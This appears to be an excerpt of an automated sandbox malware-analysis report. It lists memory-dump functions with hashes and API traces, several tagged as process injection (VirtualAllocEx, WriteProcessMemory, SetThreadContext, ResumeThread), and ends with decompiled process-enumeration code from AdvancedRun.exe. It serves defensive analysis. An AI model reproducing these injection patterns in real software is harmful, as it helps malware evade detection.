API String ID: 4046476035-0
Opcode ID: 909342b2dcca1788aca4ba009051152ef788799a8c6f4604ec836d7078978bfc
Instruction ID: a2af11b620d7e1cc83955a0fef25e24046f3772b3d425a2a3039ed7e65bd2b25
Opcode Fuzzy Hash: 909342b2dcca1788aca4ba009051152ef788799a8c6f4604ec836d7078978bfc
Instruction Fuzzy Hash: 671146B19002489FCB50DF9AD888BDEFBF8FB88324F148429E519A7700D775A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 069D8D10, Relevance: .9, Instructions: 894COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.552667476.00000000069D0000.00000040.00000001.sdmp, Offset: 069D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f0ffa98adb495b3e84aab01adb99a880870d3f7cccfc5bae307356eff6c0052
Instruction ID: 7836a9eb8f89336ae1afbbb697eae8d67f62c4fb7c0e50b036fdb179d18624e8
Opcode Fuzzy Hash: 2f0ffa98adb495b3e84aab01adb99a880870d3f7cccfc5bae307356eff6c0052
Instruction Fuzzy Hash: 52727E70A041199FDB54DFA9C984AAEBBB6FF89304F24C469E905EB761DB30DC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 069D9A70, Relevance: .9, Instructions: 883COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.552667476.00000000069D0000.00000040.00000001.sdmp, Offset: 069D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25620f585f12a7a2d6c723f917fa4cc900bf759328544aa6803eaf378f940afc
Instruction ID: b4247165022d58243dbd6c82b81e882ee266843dd797c01808617d50a7442d04
Opcode Fuzzy Hash: 25620f585f12a7a2d6c723f917fa4cc900bf759328544aa6803eaf378f940afc
Instruction Fuzzy Hash: 6D823A30A002098FDB54DF69C984AAEBBF6FF88314F25C569E406DBAA1D730ED51CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01725220, Relevance: 6.1, APIs: 4, Instructions: 123threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 01725288
GetCurrentThread.KERNEL32 ref: 017252C5
GetCurrentProcess.KERNEL32 ref: 01725302
GetCurrentThreadId.KERNEL32 ref: 0172535B

Memory Dump Source

Source File: 00000000.00000002.519183296.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ccbc258f03a46ee30140f07094bacfa75413cc4df80dbef83254f186d10b8742
Instruction ID: c98b8420793e74698cc717314a7ac63633fc6edbdba1d955041f08d6a03ae203
Opcode Fuzzy Hash: ccbc258f03a46ee30140f07094bacfa75413cc4df80dbef83254f186d10b8742
Instruction Fuzzy Hash: C35153B49042498FDB14CFA9D548BDEFBF0FF89328F24C46AE009A7290D7745985CB66

Uniqueness

Uniqueness Score: -1.00%

Function 01725228, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 01725288
GetCurrentThread.KERNEL32 ref: 017252C5
GetCurrentProcess.KERNEL32 ref: 01725302
GetCurrentThreadId.KERNEL32 ref: 0172535B

Memory Dump Source

Source File: 00000000.00000002.519183296.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9f235585ea911fdddbf037e281d5ffbf3500d680939dbe66aab15155fef8b1a4
Instruction ID: 980bd77231c43107b5cace8ab1db4ed59ea57fde1006a6b7172dbf1a07165e83
Opcode Fuzzy Hash: 9f235585ea911fdddbf037e281d5ffbf3500d680939dbe66aab15155fef8b1a4
Instruction Fuzzy Hash: F95153B09042498FDB14CFA9D548BDEFBF0FF89328F24846AE009A7290D7745945CB66

Uniqueness

Uniqueness Score: -1.00%

Function 069DEF94, Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 069DF1D6

Memory Dump Source

Source File: 00000000.00000002.552667476.00000000069D0000.00000040.00000001.sdmp, Offset: 069D0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 15720b91378303b13ae1f9a655073ed850e6c11a34c8e00db09a2c2ea67f60b4
Instruction ID: f39f6a7ec37aa588c46891da073650840b324433b84eb0cc6902341373c0af2f
Opcode Fuzzy Hash: 15720b91378303b13ae1f9a655073ed850e6c11a34c8e00db09a2c2ea67f60b4
Instruction Fuzzy Hash: A8A17B71D00259CFEF50CFA8C8867EEBBB2BF48318F148569D809A7640DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 069DEFA0, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 069DF1D6

Memory Dump Source

Source File: 00000000.00000002.552667476.00000000069D0000.00000040.00000001.sdmp, Offset: 069D0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8834bd4a0d634ed9f9b4576f83b626abe504b1ac9db0ae3b26378c3430af6f91
Instruction ID: 1944be3aadbab2a831b98fd428516f4f26afc112a56f228aa3adeea7fc887982
Opcode Fuzzy Hash: 8834bd4a0d634ed9f9b4576f83b626abe504b1ac9db0ae3b26378c3430af6f91
Instruction Fuzzy Hash: 71917B71E00259CFEF50CFA8C8867EEBBB2BF48318F148569D909A7640DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06CEE260, Relevance: 1.7, APIs: 1, Instructions: 230COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 06CEE2B9

Memory Dump Source

Source File: 00000000.00000002.552787563.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9e06cc477aa605b1f4d292c11c8e4f357d536b49a3543d3d26b889d7d95fbea2
Instruction ID: a9df0929d37e0831c921252d89b1efc28e42417184a44636cb52e76fcbe9cbd6
Opcode Fuzzy Hash: 9e06cc477aa605b1f4d292c11c8e4f357d536b49a3543d3d26b889d7d95fbea2
Instruction Fuzzy Hash: CAA11E70E152098BDB94CFA9D5897DDBBB2FF88394F188419E015EB390EB35E445CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0172E4A8, Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.519183296.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d00c9d49e29f284412c6945106501f7135302e1142efbe5ac2ac93f823f43a8d
Instruction ID: 833ad338d9d5e8cec8218b85f514922ea9c325cfb40432ee45114284a54f30a6
Opcode Fuzzy Hash: d00c9d49e29f284412c6945106501f7135302e1142efbe5ac2ac93f823f43a8d
Instruction Fuzzy Hash: 42712770A00B158FDB64CF2AD45475ABBF1FF88214F108A2ED54AD7A50EB35E846CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06CEE251, Relevance: 1.7, APIs: 1, Instructions: 154COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 06CEE2B9

Memory Dump Source

Source File: 00000000.00000002.552787563.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 28362f4b6951e4724bff1ef6a9d201bfd03972d072d93e2683b103f2c76c2bb6
Instruction ID: 71d1002dabd7bdfcbb2f07f80559f8a543b2aadd967ab3d3830c863533c1da8e
Opcode Fuzzy Hash: 28362f4b6951e4724bff1ef6a9d201bfd03972d072d93e2683b103f2c76c2bb6
Instruction Fuzzy Hash: 6E612AB0E01208CBDB94CFA9D5896DDBBB2FF88354F188519E011EB391EB75E845CB24

Uniqueness

Uniqueness Score: -1.00%

Function 069DE712, Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 069DE7A8

Memory Dump Source

Source File: 00000000.00000002.552667476.00000000069D0000.00000040.00000001.sdmp, Offset: 069D0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0003e2c4cb4ddbcc1b25f2e2a43b7899ba1961ff5844465ff3522b8882234f60
Instruction ID: 9347aae5d6d9c3ed9f7a72ac10ddb1a624649a8feac061a6086b8e4fcb072696
Opcode Fuzzy Hash: 0003e2c4cb4ddbcc1b25f2e2a43b7899ba1961ff5844465ff3522b8882234f60
Instruction Fuzzy Hash: 9F214675D003499FCB50CFA9C984BEEBBF5FF48324F14842AE918A7240D778A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 069DE718, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 069DE7A8

Memory Dump Source

Source File: 00000000.00000002.552667476.00000000069D0000.00000040.00000001.sdmp, Offset: 069D0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6c87c6ed9c3cc9774ca6e916ed85bd476fad762056a93d0df78be17ee9bde3c0
Instruction ID: bedcf70cbfd7dfd8921dc66b610a6039f5a59abfdc86c78c81f4d65a1dc42862
Opcode Fuzzy Hash: 6c87c6ed9c3cc9774ca6e916ed85bd476fad762056a93d0df78be17ee9bde3c0
Instruction Fuzzy Hash: 37214675D003099FCB40CFA9C884BDEBBF5FF48324F10842AE918A7240D7789944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 069DEA02, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 069DEA88

Memory Dump Source

Source File: 00000000.00000002.552667476.00000000069D0000.00000040.00000001.sdmp, Offset: 069D0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 7e3d49461ced79005695cbe339c36b05241223f12d5a0b290c8cba2b48fb5c7d
Instruction ID: ac0b1bc1dd1ce21547c40bd51078fc4d23c2a18613ec6169f0744397aac10d5e
Opcode Fuzzy Hash: 7e3d49461ced79005695cbe339c36b05241223f12d5a0b290c8cba2b48fb5c7d
Instruction Fuzzy Hash: A7210371D002499FCB00DFAAD984BEEBBF5FF48324F54842AE519A7240D739A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 069DD772, Relevance: 1.6, APIs: 1, Instructions: 64threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNEL32(?,00000000), ref: 069DD7F6

Memory Dump Source

Source File: 00000000.00000002.552667476.00000000069D0000.00000040.00000001.sdmp, Offset: 069D0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: eecbce0043f392eadda094f61db8ff4ddac203f8f09b2c91d29b6e234f07b836
Instruction ID: c2fc5b8cfe0dd937a9a0035194c83c0f7cbb3f200deabb2a28347174ea838f6a
Opcode Fuzzy Hash: eecbce0043f392eadda094f61db8ff4ddac203f8f09b2c91d29b6e234f07b836
Instruction Fuzzy Hash: D6217971D003088FDB10CFAAC8847EEBBF4EF88324F14842AD519A7640CB78A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 069DEA08, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 069DEA88

Memory Dump Source

Source File: 00000000.00000002.552667476.00000000069D0000.00000040.00000001.sdmp, Offset: 069D0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: db6ba88b8df8df3e23309cb50cf63de19494730700dca838bf6d54aa555cbe6b
Instruction ID: 640a8e4decca74648ea6a545c597d7b9f4c675e27239c63cbc42946b8cf305ef
Opcode Fuzzy Hash: db6ba88b8df8df3e23309cb50cf63de19494730700dca838bf6d54aa555cbe6b
Instruction Fuzzy Hash: B9211471D003499FCB00CFAAD884BEEBBF5FF48324F54842AE519A7240D7399945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 069DD778, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNEL32(?,00000000), ref: 069DD7F6

Memory Dump Source

Source File: 00000000.00000002.552667476.00000000069D0000.00000040.00000001.sdmp, Offset: 069D0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: c58809ef61b9970ec09c409f43ac2ddb08dbfab7a9d94e0c9b927b57fb944e78
Instruction ID: 3cb8358fe0554ac9361d378afb0245bf1a31b8c6fec7c9b980365562c02a767d
Opcode Fuzzy Hash: c58809ef61b9970ec09c409f43ac2ddb08dbfab7a9d94e0c9b927b57fb944e78
Instruction Fuzzy Hash: 63214971D003088FCB50DFAAC8847EEBBF4EF88364F14842AD519A7640DB78A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01725450, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017254D7

Memory Dump Source

Source File: 00000000.00000002.519183296.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bf6e179c7a3732df9aa4f080cea7f501c98c0b6e818c756183d39624b626f492
Instruction ID: 6b5a2ea95246b0db5c707861bfc6c566958e1ef4b5902bedee6f7639a6871ef6
Opcode Fuzzy Hash: bf6e179c7a3732df9aa4f080cea7f501c98c0b6e818c756183d39624b626f492
Instruction Fuzzy Hash: 6721C4B5D002589FDB10CFA9D584ADEFBF4EB48324F14841AE914A7350D379A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0172544B, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017254D7

Memory Dump Source

Source File: 00000000.00000002.519183296.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: dec4720c763d4d9b6fef491ff4e74f6f655ade650e337d58eb1dd0f88a5590c9
Instruction ID: 6a8bbf18199f935f4438c17b236ce4053eff4d75ea57bf510937bd88cf2bdce7
Opcode Fuzzy Hash: dec4720c763d4d9b6fef491ff4e74f6f655ade650e337d58eb1dd0f88a5590c9
Instruction Fuzzy Hash: E421B0B6D002599FDB10CFA9D984BDEFBF4EB48324F14841AE918A7350D378A945CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0172E908, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,?,?), ref: 0172E97A

Memory Dump Source

Source File: 00000000.00000002.519183296.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a7434e39a6855007bd8eab0749bf2429a19be87b97bd0c23fa9d701faeda5bd9
Instruction ID: 4a745961606297ad847c730cfcf629fcb8a3ce5579da2dd2cf12fe69d6bc1453
Opcode Fuzzy Hash: a7434e39a6855007bd8eab0749bf2429a19be87b97bd0c23fa9d701faeda5bd9
Instruction Fuzzy Hash: BF2156B6D002098FDB14CF9AD444BDEFBF4EB88324F14852AD569B7600C779A945CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 069DE458, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 069DE4C6

Memory Dump Source

Source File: 00000000.00000002.552667476.00000000069D0000.00000040.00000001.sdmp, Offset: 069D0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9d501c037fc1965165a88f08b859b6d38f02c92fceca43f74de607f277b59594
Instruction ID: 2faf057eac810a0e25a28c80de14b1ffeef8cd2ae148403965e883ebba4ffea7
Opcode Fuzzy Hash: 9d501c037fc1965165a88f08b859b6d38f02c92fceca43f74de607f277b59594
Instruction Fuzzy Hash: D11126719002489FCB10DFA9D844BDEBBF5EB88324F148829E519A7650C779A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 069DE450, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 069DE4C6

Memory Dump Source

Source File: 00000000.00000002.552667476.00000000069D0000.00000040.00000001.sdmp, Offset: 069D0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2cfbe0161c6eaa4117893897f031f4bdf8e4016f08b7838c9162f918fb5973fb
Instruction ID: 9708eb49357f06f4383e7b24bf411c9b4af6b4b21f6d508c751a43137cd7e2db
Opcode Fuzzy Hash: 2cfbe0161c6eaa4117893897f031f4bdf8e4016f08b7838c9162f918fb5973fb
Instruction Fuzzy Hash: AD116776D002488FCF10DFA9D9447EEBBF5EF48324F14882AE519A7640CB39A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 069DF570, Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 069DF5DA

Memory Dump Source

Source File: 00000000.00000002.552667476.00000000069D0000.00000040.00000001.sdmp, Offset: 069D0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c345543a89457c6e8c29d03b690e8d5f44db5c4d9dd6aecea15715885ebe7f51
Instruction ID: 2c9bd0e465bf56fe9ba8270806905f92fcaca24a707e726cece71947904fd826
Opcode Fuzzy Hash: c345543a89457c6e8c29d03b690e8d5f44db5c4d9dd6aecea15715885ebe7f51
Instruction Fuzzy Hash: E0114671D003088FDB10DFAAD8497EEBBF4EF88324F148829D519A7640DB79A945CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0172E910, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,?,?), ref: 0172E97A

Memory Dump Source

Source File: 00000000.00000002.519183296.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 10ebe08127b182969f97b1f0027a34088761c1fc0785c5911d53517ed1351f0f
Instruction ID: 59019c4c95c84eb90325d8b52fb8bac41ebfc41687a9eebbd87c133eadaaa011
Opcode Fuzzy Hash: 10ebe08127b182969f97b1f0027a34088761c1fc0785c5911d53517ed1351f0f
Instruction Fuzzy Hash: BC1123B6D002098FDB10CF9AD444BDEFBF4AB88320F04842AD569A7200C779A945CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0172D974, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,0172E4BB), ref: 0172E6EE

Memory Dump Source

Source File: 00000000.00000002.519183296.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b9129b75354f5214f9e77ed18d17ddba7c95aa38fe0b0e1b3f06b72f7dc59623
Instruction ID: 5627e5f51ee330b49778685312e419f6e617179fa22c146a1b86a2a37744bf73
Opcode Fuzzy Hash: b9129b75354f5214f9e77ed18d17ddba7c95aa38fe0b0e1b3f06b72f7dc59623
Instruction Fuzzy Hash: 3B1104B5D002598FDB20CF9AD444BDEFBF4EB88324F14852AD519A7200D775A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 069DF578, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 069DF5DA

Memory Dump Source

Source File: 00000000.00000002.552667476.00000000069D0000.00000040.00000001.sdmp, Offset: 069D0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0511c25974ab701a21fb6dfe93a936aa8ac0b5fdad2e7b7fea1e08c9bb6ae617
Instruction ID: 9bc48b333b95378830ea2e1a644bd042f7eaa54b6e970712950a4c42f44cfea2
Opcode Fuzzy Hash: 0511c25974ab701a21fb6dfe93a936aa8ac0b5fdad2e7b7fea1e08c9bb6ae617
Instruction Fuzzy Hash: 4E112871D003488FCB10DFAAD8497EEFBF4AB88324F148429D519A7640DB79A945CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0172B2F8, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0172B35D

Memory Dump Source

Source File: 00000000.00000002.519183296.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: bc7f73bbb889122049bc3dc16f6cb7330db7b6cb4fc5ec30f16cd385808d5432
Instruction ID: f512d0d85ca5bc87d05e617b16191f79ef61b807e379ae5363d02dd071a3f226
Opcode Fuzzy Hash: bc7f73bbb889122049bc3dc16f6cb7330db7b6cb4fc5ec30f16cd385808d5432
Instruction Fuzzy Hash: 4C11BF75804399CEDB10CF99D4047DEFFF4EB09328F04846DD595A7282C7399604CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0172B2F7, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0172B35D

Memory Dump Source

Source File: 00000000.00000002.519183296.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a64f90db171f611094797a8ea4ee71cd420b18fca2bae9155157ea27e9e41114
Instruction ID: 4e3db10516197e9a719fdfd9b0eba3bda601d09751948eb47f3cecfdb133b91f
Opcode Fuzzy Hash: a64f90db171f611094797a8ea4ee71cd420b18fca2bae9155157ea27e9e41114
Instruction Fuzzy Hash: FE11BF79804399CEDB10CF98D5043EEFFF4EB08328F04846AD595B7282C7389604CBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0172EDE8, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.519183296.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de04058e60a4e59f42cf956009f0dd8828d4bc74249423e0965f8e68a3408077
Instruction ID: 585a0aefb060988696961b89e231d95317228c874eed94752ca0b5311fc88fda
Opcode Fuzzy Hash: de04058e60a4e59f42cf956009f0dd8828d4bc74249423e0965f8e68a3408077
Instruction Fuzzy Hash: FA12B1F951174A8AE730CF65E9981893FE1B74933CB90C308D2616FAD9D7B8164ACF84

Uniqueness

Uniqueness Score: -1.00%

Function 0172C328, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.519183296.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4c432f8e72b5cc8ecafa4181a89f3d3392f211a1764d92dca1f80af0578dad6
Instruction ID: f545c737d6f92736858a943c916b20c5290289b4a4225e47bcc054d8674fbd64
Opcode Fuzzy Hash: f4c432f8e72b5cc8ecafa4181a89f3d3392f211a1764d92dca1f80af0578dad6
Instruction Fuzzy Hash: 74A16F32E0062A8FCF15DFA5C8445EDFBF2FF95300B15856AE905BB225EB71A946CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0172EDE3, Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.519183296.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3307d435a716c30aac92ff5ecf1ee79d75029075e1dfb81c64367c2daf20d1ff
Instruction ID: a2b912e3dc95cc3b7cbeb0398c87ac240ed89c2accf4985b41037c786f77e7be
Opcode Fuzzy Hash: 3307d435a716c30aac92ff5ecf1ee79d75029075e1dfb81c64367c2daf20d1ff
Instruction Fuzzy Hash: B4C1E9B991174A8AD720CF65E9881897FF1BB8933CF508309D2616FAD8D7B4164ACF84

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AdvancedRun.exe PID: 1864 Parent PID: 5308 AdvancedRun.exeCOMMON

Executed Functions

Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120
processlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				int _t46;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(1) {
					_t46 = Process32NextW(_v12,  &_v1136); // executed
					if(_t46 == 0) {
						break;
					}
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}

0x00409609
0x0040960f
0x00409619
0x00409623
0x0040962e
0x00409633
0x00409640
0x0040964a
0x00409782
0x0040978c
0x00409793
0x00000000
0x00000000
0x0040965a
0x0040965f
0x00409678
0x0040967e
0x00409681
0x00409685
0x00409688
0x004096b2
0x004096bf
0x004096c6
0x004096cb
0x004096da
0x004096e6
0x0040973b
0x00409747
0x0040975f
0x00409764
0x0040976a
0x00409770
0x00409773
0x0040977d
0x00000000
0x0040977d
0x004096ee
0x004096f5
0x004096fc
0x00409704
0x0040970c
0x0040971c
0x0040971c
0x00409704
0x00409721
0x00409728
0x00409739
0x00409739
0x00000000
0x00409728
0x00409693
0x00000000
0x00000000
0x004096a5
0x004096a9
0x004096ac
0x00000000
0x00000000
0x00000000
0x004096ac
0x004097a6

APIs

Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
memset.MSVCRT ref: 0040962E
Process32FirstW.KERNEL32(?,?), ref: 0040964A
OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
memset.MSVCRT ref: 004096C6
GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C

Strings

kernel32.dll, xrefs: 004096F7
QueryFullProcessImageNameW, xrefs: 00409706

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
String ID: QueryFullProcessImageNameW$kernel32.dll
